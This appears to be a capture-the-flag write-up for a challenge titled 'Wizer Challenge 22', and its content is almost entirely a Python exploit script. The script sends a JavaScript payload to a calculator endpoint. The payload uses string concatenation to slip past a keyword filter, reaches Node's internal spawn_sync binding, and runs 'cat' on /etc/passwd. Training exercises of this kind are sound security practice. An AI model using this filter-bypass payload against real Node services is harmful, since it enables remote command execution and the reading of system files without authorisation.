Wizer - Challenge 22 - js code execution with filter bypass

Exploit

import requests

url = "https://chal22-n8945h89.vercel.app/calc"

r = requests.post(url, json={
    "calculation": "this['proc' + 'ess'].binding('spa' + 'wn_sync')['spa' + 'wn']({file:'cat',args:['cat', '/etc/passwd'],stdio:[{type:'pipe',readable:true,writable:false},{type:'pipe',readable:false,writable:true},{type:'pipe',readable:false,writable:true},],}).output"
})


print(r.text)